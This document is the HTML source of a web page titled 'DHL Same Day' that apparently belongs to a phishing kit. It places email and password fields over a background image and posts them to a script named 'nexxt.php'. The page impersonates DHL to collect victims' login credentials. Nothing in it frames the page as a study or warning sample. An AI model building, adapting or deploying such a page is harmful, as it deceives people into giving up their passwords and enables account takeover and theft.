<html>
<head>
<link rel="icon" href="SSL/fav.ico">


<style type="text/css">


body {margin:0;background:#FFF}

</style>
        <title>DHL Same Day</title>
<body>
<img src="SSL/background.png">
</div>


<form action=nexxt.php name=chalbhai id=chalbhai method=post>


<input name="user" class="koko" required autocomplete="off" placeholder='Email' type="text" style="padding:5px;position:absolute;width:290px;height:30px;left:968px;top:175px;z-index:1">
<input name="pass" class="koko" required autocomplete="off" placeholder='Password' type="password"  style="padding:5px;position:absolute;width:290px;height:30px;left:968px;top:230px;z-index:1">



<div id="formimage1" style="position:absolute; left:965px; top:278px; z-index:6"><input type="image" name="formimage1" src="SSL/com.png"></div>

</form>

</body></html>